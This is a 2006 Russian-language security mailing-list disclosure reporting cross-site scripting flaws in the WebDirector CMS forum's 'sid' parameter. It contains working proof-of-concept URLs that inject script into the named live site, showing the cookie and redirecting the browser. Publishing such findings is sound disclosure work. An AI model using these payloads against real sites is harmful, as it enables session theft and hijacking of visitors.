Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Vulnerability: ModernBill Insecure CURL Settings

phpECard (functions. php) Remote File Inclusion Exploit

ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit

MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	30.08.2006
Subject:	Уязвимости в CMS WebDirector

Здравствуйте администрация security.nnov.ru!

Решил прислать вам в багтрак информацию об уязвимости в CMS WebDirector.

О которой я уже упомянул у себя на сайте (http://websecurity.com.ua/93/) и сообщил
администрации сайта webdirector.ru и разработчикам CMS.

В начале этого месяца я заходил на сайт webdirector.ru, за дополнительной информацией о
данной CMS, и нашёл Cross-Site Scripting уязвимость (в двух параметрах).

XSS:

http://www.webdirector.ru/forum.html?sid=root_2c8f_%22%3Cscript%3Eale
rt(document.cookie)%3C/script%3E
http://www.webdirector.ru/forum.html?sid=root_%22%3Cscript%3Ealert(
document.cookie)%3C/script%3E

http://www.webdirector.ru/forum.html?sid=root_%22%3Cscript%3Edocument
.location%3D'http://websecurity.com.ua'%3C/script%3E

Разработчикам WebDirector стоит уделять внимание безопасности своего сайта и своей
системы.

Best wishes & regards,
MustLive
Администратор сайтов
http://mlfun.org.ua
http://websecurity.com.ua